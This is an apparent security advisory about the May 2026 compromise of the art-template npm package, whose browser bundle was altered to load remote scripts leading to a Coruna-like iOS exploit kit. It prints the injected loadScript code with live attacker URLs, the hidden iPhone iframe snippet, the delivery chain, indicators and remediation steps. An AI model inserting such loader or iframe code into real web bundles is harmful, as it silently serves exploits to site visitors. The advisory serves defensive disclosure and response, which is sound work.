art-template npm compromise delivered a Coruna-like iOS exploit kit

critical

CVE

CVE-2024-23222

CWE

CWE-506

Affected Surface

art-template 4.13.3, art-template 4.13.5, art-template 4.13.6, Browser bundles that include lib/template-web.js from affected art-template releases, Sites serving bundled art-template code to Safari or iOS users, Companion packages controlled by the changed npm maintainer set: express-art-template, art-template-loader, and koa-art-template

On 20 May 2026, Socket and SafeDep published analysis of a compromise in the npm package art-template, a long-standing JavaScript templating library. This incident is unusual because the malicious code was not an install-time developer credential stealer. It was appended to the browser bundle and executed in the browsers of downstream application users.

The affected package is art-template. The last known clean release is 4.13.2. Confirmed malicious releases are:

art-template@4.13.3
art-template@4.13.5
art-template@4.13.6

SafeDep also identified 4.13.4 as an unauthorized release, but did not find the same browser-bundle injection in that version. Treat it as untrusted for provenance purposes, but prioritize the three injected versions when looking for runtime impact.

Why this matters

Most recent npm supply-chain incidents have targeted developer workstations, CI runners, and publish tokens through preinstall, postinstall, or import-time execution. The art-template compromise targets a different trust boundary: users who visit websites built with a poisoned frontend dependency.

If an application bundled the affected lib/template-web.js file and served it to users, the malicious loader ran in the page’s origin. That gives the attacker the same browser capabilities as any other script on the site: cookie access where cookies are not HttpOnly, local storage access, DOM manipulation, redirects, iframe injection, and further payload staging. Socket and SafeDep both tie the final chain to a Coruna-like iOS exploit framework targeting Safari/WebKit.

Injection point

The malicious code is appended to lib/template-web.js, the browser-side bundle. Server-side Node.js consumers that only require the package’s Node entry point are not directly exposed to this browser payload, but repositories should still remove the affected artifacts because builds often copy browser bundles into static assets.

For 4.13.5, SafeDep reconstructs the appended code as:

function loadScript(url) {
  const script = document.createElement('script');
  script.src = url;
  script.type = 'text/javascript';
  script.async = true;
  document.head.appendChild(script);
}

loadScript('https://v3.jiathis.com/code/jia.js?uid=artemplate');

Version 4.13.6 keeps the same primitive and changes the URL:

loadScript('https://v3.jiathis.com/code/art.js');

Version 4.13.3 used a more obfuscated String.fromCharCode loader. The decoded target was hxxps://git.youzzjizz[.]com/git.js. That earlier package was also partially broken because the tarball omitted expected server-side files, but the standalone browser bundle could still execute if a site consumed it directly.

Delivery chain

The browser-side chain reported by Socket and SafeDep is:

art-template@4.13.5 or 4.13.6
  -> lib/template-web.js appends loadScript(...)
  -> hxxps://v3.jiathis[.]com/code/jia.js or art.js
  -> Baidu Analytics is injected for all visitors
  -> iPhone user agents receive a hidden iframe
  -> hxxps://utaq[.]cfww[.]shop/gooll/gooll.html
  -> 49554fde7424c31c.js
  -> Safari/iOS fingerprinting and remote module dispatch

The first-stage remote script is reportedly gated. SafeDep observed that a request without a Referer header returned a near-empty response, while a browser-like script load with Referer returned the full JavaScript payload. That kind of server-side filtering makes simple IOC fetches and sandbox crawlers less reliable.

The iPhone-specific stage creates a hidden iframe and places it inside a closed Shadow DOM root:

var isIphone = /iPhone/i.test(navigator.userAgent);
if (!isIphone) return;

var frame = document.createElement('iframe');
frame.src = atob('aHR0cHM6Ly91dGFxLmNmd3cuc2hvcC8=');
Object.assign(frame.style, {
  width: '0px',
  height: '0px',
  border: 'none',
  position: 'fixed',
  top: '-1000px',
  left: '-1000px',
});

That design hides the payload from visual inspection and from simple DOM queries that do not pierce a closed shadow root.

Exploit-kit behavior

Socket’s analysis describes the final 49554fde7424c31c.js loader as a Safari/WebKit gate that rejects Chrome, Firefox, Edge, Android, and iOS versions outside the selected ranges. SafeDep’s deeper module analysis links the chain to the Coruna iOS exploit kit documented by Google TAG.

The reported targeting window includes iOS 11 through iOS 17.2, with a hard cutoff at iOS 17.3 and later. That cutoff is important because CVE-2024-23222, a JavaScriptCore type confusion issue used by Coruna’s newer chain, was patched by Apple in iOS 17.3.

Technical behaviors reported across the loader and remote modules include:

Safari and WebKit user-agent gating.
WebRTC, WebGL, MathML, IndexedDB, touch, and automation checks.
WebAssembly-based fingerprinting and proof-of-work style validation.
Per-version memory-layout offsets for JIT output checks.
Content-addressed remote module loading through derived SHA-256 paths.
ARM64/arm64e architecture branching.
Native shellcode that references ptrace, mmap, mprotect, Mach traps, and Apple frameworks.

This is not an ad-injection or analytics-only incident. A poisoned frontend package can become a browser exploit delivery surface for every user who loads the affected bundle.

Package ownership risk

SafeDep reports that the original npm maintainer no longer appears on art-template or related packages. The changed maintainer set also controls companion packages:

express-art-template
art-template-loader
koa-art-template

Those packages had not received new malicious versions in the public reporting reviewed here, but ownership control matters. Organizations that still depend on this ecosystem should pin known-clean versions, mirror artifacts internally, and avoid automatic promotion of new releases from the changed maintainer set until ownership is resolved.

Indicators

Package indicators:

art-template@4.13.3
art-template@4.13.5
art-template@4.13.6
lib/template-web.js containing v3.jiathis[.]com
lib/template-web.js containing git.youzzjizz[.]com

Network and payload indicators reported by Socket and SafeDep:

v3[.]jiathis[.]com/code/jia.js
v3[.]jiathis[.]com/code/art.js
git[.]youzzjizz[.]com/git.js
utaq[.]cfww[.]shop
utaq[.]cfww[.]shop/gooll/gooll.html
l1ewsu3yjkqeroy[.]xyz/api/ip-sync/sync
hm[.]baidu[.]com/hm.js?7d86eb847ecfd3c972fa457a6abaa0da
49554fde7424c31c.js SHA-256 f31bdd069fe7966ae11be1f78ee5dd44445938856dd1df12379e0e84a6851f5c

Remediation

Pin art-template to 4.13.2 or remove the dependency. Search package manifests, lockfiles, package-manager caches, deployed bundles, static asset directories, CDN uploads, and build artifacts for the affected versions and for the injected domains.

Useful searches:

rg "art-template@?4\\.13\\.(3|5|6)|v3\\.jiathis|git\\.youzzjizz|utaq\\.cfww|l1ewsu3yjkqeroy" .

For web applications that may have served the affected bundle, response should include both dependency cleanup and user-impact review:

Rebuild and redeploy static assets from a clean lockfile.
Invalidate CDN and edge caches containing affected bundles.
Review access logs for requests to the affected JavaScript bundle during the exposure window.
Add browser-side CSP controls that prevent unexpected script loads from v3.jiathis[.]com and iframe loads from utaq[.]cfww[.]shop.
Review client-side telemetry for iOS/Safari users redirected through the iframe chain.

If the affected bundle was served from an authenticated application, rotate any tokens stored in JavaScript-readable cookies or browser storage. Even if exploit delivery was iOS-gated, the injected script executed in the site’s origin before the chain selected victims.